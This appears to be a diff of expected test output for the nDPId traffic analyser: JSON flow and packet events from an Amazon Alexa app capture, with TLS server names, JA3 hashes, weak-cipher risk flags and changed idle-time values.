-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2507,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1490976150125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976150125,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwoZ9AAOcG\/lo0XuiGrBAq2AG7sra0EJrCzlCTz3ASH\/4K2QAAAgQFtAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2508,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":3,"flow_last_seen":1490976150126,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976150126,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo6yhAAEAGW9qsECrYNF7ohrK2AbvOUJPPtBCaw1AQAVdVSgAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2509,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976150029,"flow_last_seen":1490976150127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976150127,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976150029,"flow_last_seen":1490976150196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976150196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976031691,"flow_last_seen":1490976032855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2154,"flow_avg_l4_payload_len":215,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976142629,"flow_last_seen":1490976142629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976142629,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1490976142629,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976142629,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Si5AAEAGxLmsECrYNu8d\/Z+uAbuBOjwrAAAAAKAC\/\/9GYAAAAgQFtAQCCAoA9nYFAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2481,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":2,"flow_last_seen":1490976142691,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976142691,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0iJAAOcGldA27x39rBAq2AG7n66gUyr3gTo8LHASH\/4OHAAAAgQFtAEDAwY="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2482,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":3,"flow_last_seen":1490976142696,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976142696,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoSi9AAEAGxMysECrYNu8d\/Z+uAbuBOjwsoFMq+FAQAVdYjQAA"} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2483,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976142629,"flow_last_seen":1490976142698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976142698,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2484,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976142629,"flow_last_seen":1490976142816,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976142816,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2506,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976150029,"flow_last_seen":1490976150029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976150029,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2506,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1490976150029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976150029,"pkt":"AMDKkaPvePiC0\/vCCABFAAA86ydAAEAGW8esECrYNF7ohrK2AbvOUJPOAAAAAKAC\/\/\/DwQAAAgQFtAQCCAoA9njpAAAAAAEDAwg="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2507,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1490976150125,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976150125,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwoZ9AAOcG\/lo0XuiGrBAq2AG7sra0EJrCzlCTz3ASH\/4K2QAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2508,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":3,"flow_last_seen":1490976150126,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976150126,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo6yhAAEAGW9qsECrYNF7ohrK2AbvOUJPPtBCaw1AQAVdVSgAA"} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2509,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976150029,"flow_last_seen":1490976150127,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976150127,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976150029,"flow_last_seen":1490976150196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976150196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027958,"flow_last_seen":1490976030758,"flow_idle_time":120000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1490976023731,"flow_last_seen":1490976031750,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976035553,"flow_last_seen":1490976036358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2531,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976158680,"flow_last_seen":1490976158680,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976158680,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2531,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1490976158680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976158680,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8\/ohAAEAGSGasECrYNF7ohrK3Abt2joLDAAAAAKAC\/\/8pLAAAAgQFtAQCCAoA9nxLAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2532,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1490976158840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976158840,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwc8dAAOcGLDM0XuiGrBAq2AG7sreYM6oZdo6CxHASH\/6AKwAAAgQFtAEDAwY="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2533,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":1490976158841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976158841,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo\/olAAEAGSHmsECrYNF7ohrK3Abt2joLEmDOqGlAQAVfKnAAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2534,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976158680,"flow_last_seen":1490976158842,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976158842,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2535,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976158680,"flow_last_seen":1490976159147,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976159147,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1490976044439,"flow_last_seen":1490976046418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":2175,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976041156,"flow_last_seen":1490976043655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10376,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976041384,"flow_last_seen":1490976042405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1098,"flow_tot_l4_payload_len":2371,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976041400,"flow_last_seen":1490976042398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1130,"flow_tot_l4_payload_len":2403,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1490976044189,"flow_last_seen":1490976046415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1178,"flow_tot_l4_payload_len":6385,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1490976044219,"flow_last_seen":1490976046417,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1194,"flow_tot_l4_payload_len":6417,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976044488,"flow_last_seen":1490976046418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1146,"flow_tot_l4_payload_len":4402,"flow_avg_l4_payload_len":200,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1490976044502,"flow_last_seen":1490976046415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1130,"flow_tot_l4_payload_len":2403,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1490976044509,"flow_last_seen":1490976046418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1490976044521,"flow_last_seen":1490976046418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1490976046418,"flow_last_seen":1490976048924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1194,"flow_tot_l4_payload_len":9785,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1490976047096,"flow_last_seen":1490976048927,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1490976041942,"flow_last_seen":1490976046399,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41433,"flow_avg_l4_payload_len":531,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976041961,"flow_last_seen":1490976042341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5681,"flow_avg_l4_payload_len":334,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 